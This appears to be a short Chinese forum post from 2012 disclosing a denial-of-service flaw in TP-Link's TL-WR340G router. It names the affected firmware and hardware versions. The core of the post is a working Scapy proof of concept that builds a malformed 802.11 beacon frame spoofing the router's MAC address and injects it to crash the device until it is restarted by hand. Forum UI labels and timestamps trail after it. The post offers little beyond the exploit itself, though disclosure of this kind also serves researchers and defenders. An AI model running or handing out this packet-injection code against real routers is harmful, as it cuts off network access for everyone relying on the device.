|
TL-WR340G是TP-Link出品的一款轻量级无线路由器,近日有国外黑客发现了这款路由器上的一个拒绝服务漏洞,只要发送一个简单的畸形包到路由器,便可使路由器停止工作,需要手动重启路由器才能恢复正常,算是比较严重的了 漏洞细节: 型号:TL-WR340G无线路由器
固件版本: 4.7.11 Build 101102 Rel.60376n
硬件版本:WR340G v3 触发漏洞的过程非常简单,需要用到网络软件Scapy,构造包的详情如下: 1 | fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2="<AP |
2 | MAC>",addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt() |
接下来发送数据包: 1 | sendp(fr,iface="injection capable wireless interface",count=5) |
攻击成功之后,路由器将直接挂掉,具体表现就是不管已经连接还是未连接的客户端都无法连接互联网,除非手动登入管理界面软重启或者断电重启。 | 
窥视卡
雷达卡
发表于 2012-9-30 06:30:05
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2012-10-2 19:04:11